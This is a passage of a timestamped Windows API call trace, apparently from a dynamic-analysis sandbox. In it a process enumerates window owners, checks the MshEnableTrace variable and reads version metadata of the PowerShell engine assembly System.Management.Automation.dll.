	[0312.994] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x1ec
	[0312.994] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x440
	[0312.994] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x7e8
	[0312.994] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x730
	[0312.995] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x2c8
	[0312.995] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x31c
	[0312.995] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x330
	[0312.995] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x128
	[0312.995] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x5c8
	[0312.995] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x6f8
	[0312.995] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x358
	[0312.995] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x73c
	[0312.995] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xb0
	[0312.996] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x250
	[0312.996] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x240
	[0312.996] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x790
	[0312.996] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x61c
	[0312.996] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x540
	[0312.996] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x538
	[0312.996] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x568
	[0312.996] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x538
	[0312.996] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x568
	[0312.996] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x538
	[0312.997] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x540
	[0312.997] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x540
	[0312.997] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x57c
	[0312.997] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x460
	[0312.997] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x554
	[0312.997] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.997] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x528
	[0312.997] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.997] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.997] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.998] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x79c
	[0312.998] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.998] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4e0
	[0312.998] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.998] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x460
	[0312.998] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x460
	[0312.998] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x44c
	[0312.998] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x778
	[0312.998] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x460
	[0312.998] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x558
	[0312.998] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.999] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.999] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xd10
	[0312.999] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xd0c
	[0312.999] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xc9c
	[0312.999] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xc74
	[0312.999] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xc1c
	[0312.999] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xc08
	[0312.999] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xabc
	[0312.999] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x24c
	[0312.999] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xbb0
	[0313.000] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xbfc
	[0313.000] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xb10
	[0313.000] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x374
	[0313.000] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x368
	[0313.000] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xb28
	[0313.000] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xae8
	[0313.000] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xb14
	[0313.000] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x95c
	[0313.000] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xa8c
	[0313.000] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x46c
	[0313.001] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xb3c
	[0313.001] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xa90
	[0313.001] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xad0
	[0313.001] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xa9c
	[0313.001] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xaa0
	[0313.001] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xb1c
	[0313.001] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x7e0
	[0313.002] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xa74
	[0313.002] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x694
	[0313.002] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xa28
	[0313.002] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x9b0
	[0313.002] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x8d8
	[0313.002] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x940
	[0313.002] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x93c
	[0313.002] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4ec
	[0313.003] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x150
	[0313.003] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x720
	[0313.003] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x3c4
	[0313.003] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x7d4
	[0313.003] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x6c8
	[0313.003] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xb54
	[0313.003] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xb54
	[0313.003] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xb5c
	[0313.003] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x838
	[0313.003] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x818
	[0313.004] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x5b8
	[0313.004] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x494
	[0313.004] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x1ec
	[0313.004] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x440
	[0313.004] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x7e8
	[0313.004] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x730
	[0313.004] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x2c8
	[0313.004] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x31c
	[0313.004] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x330
	[0313.004] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x128
	[0313.005] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x5c8
	[0313.005] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x6f8
	[0313.005] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x358
	[0313.005] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x73c
	[0313.005] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xb0
	[0313.005] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x250
	[0313.005] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x240
	[0313.005] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x790
	[0313.005] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x61c
	[0313.005] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x568
	[0313.006] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x538
	[0313.006] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x540
	[0313.006] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x460
	[0313.006] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x79c
	[0313.006] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4e0
	[0313.006] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x460
	[0313.006] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x778
	[0313.009] WerSetFlags () returned 0x0
	[0313.017] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0313.657] CoTaskMemFree (pv=0x0) 
	[0313.658] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1adaa8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1adaa0 | out: pulNumLanguages=0x1adaa8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1adaa0) returned 1
	[0313.658] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1adaa8, pwszLanguagesBuffer=0x2cbc6b8, pcchLanguagesBuffer=0x1adaa0 | out: pulNumLanguages=0x1adaa8, pwszLanguagesBuffer=0x2cbc6b8, pcchLanguagesBuffer=0x1adaa0) returned 1
	[0313.663] CoTaskMemAlloc (cb=0x24) returned 0x470c30
	[0313.663] GetUserDefaultLocaleName (in: lpLocaleName=0x470c30, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0313.663] CoTaskMemFree (pv=0x470c30) 
	[0313.687] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0313.687] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0313.687] CoTaskMemFree (pv=0x467e50) 
	[0313.689] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0313.689] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0313.689] CoTaskMemFree (pv=0x467e50) 
	[0313.691] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0313.691] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0313.692] CoTaskMemFree (pv=0x467e50) 
	[0313.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0313.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0313.702] SetErrorMode (uMode=0x1) returned 0x1
	[0313.702] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ad720 | out: lpFileInformation=0x1ad720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0313.702] SetErrorMode (uMode=0x1) returned 0x1
	[0313.702] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1ad990 | out: lpdwHandle=0x1ad990) returned 0x94c
	[0314.473] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cbff48 | out: lpData=0x2cbff48) returned 1
	[0314.474] VerQueryValueW (in: pBlock=0x2cbff48, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ad908, puLen=0x1ad900 | out: lplpBuffer=0x1ad908*=0x2cbffe4, puLen=0x1ad900) returned 1
	[0314.474] VerQueryValueW (in: pBlock=0x2cbff48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1ad878, puLen=0x1ad870 | out: lplpBuffer=0x1ad878*=0x2cc00c0, puLen=0x1ad870) returned 1
	[0314.474] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0314.474] CoTaskMemAlloc (cb=0x2e) returned 0x46f150
	[0314.474] lstrcpyW (in: lpString1=0x46f150, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0314.474] CoTaskMemFree (pv=0x46f150) 
	[0314.474] VerQueryValueW (in: pBlock=0x2cbff48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1ad878, puLen=0x1ad870 | out: lplpBuffer=0x1ad878*=0x2cc0114, puLen=0x1ad870) returned 1
	[0314.474] lstrlenW (lpString="System.Management.Automation") returned 28
	[0314.474] CoTaskMemAlloc (cb=0x3c) returned 0x3a9900
	[0314.474] lstrcpyW (in: lpString1=0x3a9900, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0314.474] CoTaskMemFree (pv=0x3a9900) 
	[0314.474] VerQueryValueW (in: pBlock=0x2cbff48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1ad878, puLen=0x1ad870 | out: lplpBuffer=0x1ad878*=0x2cc0170, puLen=0x1ad870) returned 1
	[0314.474] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0314.474] CoTaskMemAlloc (cb=0x20) returned 0x470c90
	[0314.474] lstrcpyW (in: lpString1=0x470c90, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0314.474] CoTaskMemFree (pv=0x470c90) 
	[0314.474] VerQueryValueW (in: pBlock=0x2cbff48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1ad878, puLen=0x1ad870 | out: lplpBuffer=0x1ad878*=0x2cc01b0, puLen=0x1ad870) returned 1
	[0314.475] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0314.475] CoTaskMemAlloc (cb=0x44) returned 0x3a9900
	[0314.475] lstrcpyW (in: lpString1=0x3a9900, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0314.475] CoTaskMemFree (pv=0x3a9900) 
	[0314.475] VerQueryValueW (in: pBlock=0x2cbff48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1ad878, puLen=0x1ad870 | out: lplpBuffer=0x1ad878*=0x2cc0218, puLen=0x1ad870) returned 1
	[0314.475] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0314.475] CoTaskMemAlloc (cb=0x76) returned 0x4191e0
	[0314.475] lstrcpyW (in: lpString1=0x4191e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0314.475] CoTaskMemFree (pv=0x4191e0) 
	[0314.475] VerQueryValueW (in: pBlock=0x2cbff48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1ad878, puLen=0x1ad870 | out: lplpBuffer=0x1ad878*=0x2cc02b4, puLen=0x1ad870) returned 1
	[0314.475] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0314.475] CoTaskMemAlloc (cb=0x44) returned 0x3a9900
	[0314.475] lstrcpyW (in: lpString1=0x3a9900, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0314.475] CoTaskMemFree (pv=0x3a9900) 
	[0314.475] VerQueryValueW (in: pBlock=0x2cbff48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1ad878, puLen=0x1ad870 | out: lplpBuffer=0x1ad878*=0x2cc0318, puLen=0x1ad870) returned 1
	[0314.475] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0314.475] CoTaskMemAlloc (cb=0x58) returned 0x3f74c0
	[0314.475] lstrcpyW (in: lpString1=0x3f74c0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0314.475] CoTaskMemFree (pv=0x3f74c0) 
	[0314.475] VerQueryValueW (in: pBlock=0x2cbff48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1ad878, puLen=0x1ad870 | out: lplpBuffer=0x1ad878*=0x2cc0394, puLen=0x1ad870) returned 1
	[0314.475] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0314.475] CoTaskMemAlloc (cb=0x20) returned 0x470c90
	[0314.475] lstrcpyW (in: lpString1=0x470c90, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0314.475] CoTaskMemFree (pv=0x470c90) 
	[0314.475] VerQueryValueW (in: pBlock=0x2cbff48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1ad878, puLen=0x1ad870 | out: lplpBuffer=0x1ad878*=0x2cc003c, puLen=0x1ad870) returned 1
	[0314.475] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0314.475] CoTaskMemAlloc (cb=0x66) returned 0x3ec3d0
	[0314.476] lstrcpyW (in: lpString1=0x3ec3d0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0314.476] CoTaskMemFree (pv=0x3ec3d0) 
	[0314.476] VerQueryValueW (in: pBlock=0x2cbff48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1ad878, puLen=0x1ad870 | out: lplpBuffer=0x1ad878*=0x0, puLen=0x1ad870) returned 0
	[0314.476] VerQueryValueW (in: pBlock=0x2cbff48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1ad878, puLen=0x1ad870 | out: lplpBuffer=0x1ad878*=0x0, puLen=0x1ad870) returned 0
	[0314.476] VerQueryValueW (in: pBlock=0x2cbff48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1ad878, puLen=0x1ad870 | out: lplpBuffer=0x1ad878*=0x0, puLen=0x1ad870) returned 0
	[0314.476] VerQueryValueW (in: pBlock=0x2cbff48, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ad848, puLen=0x1ad840 | out: lplpBuffer=0x1ad848*=0x2cbffe4, puLen=0x1ad840) returned 1
	[0314.476] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0314.476] VerLanguageNameW (in: wLang=0x0, szLang=0x414cc0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0314.476] CoTaskMemFree (pv=0x414cc0) 
	[0314.476] VerQueryValueW (in: pBlock=0x2cbff48, lpSubBlock="\\", lplpBuffer=0x1ad898, puLen=0x1ad890 | out: lplpBuffer=0x1ad898*=0x2cbff70, puLen=0x1ad890) returned 1
	[0314.486] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0314.486] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0314.486] CoTaskMemFree (pv=0x467e50) 
	[0314.490] CoTaskMemAlloc (cb=0x104) returned 0x467e50
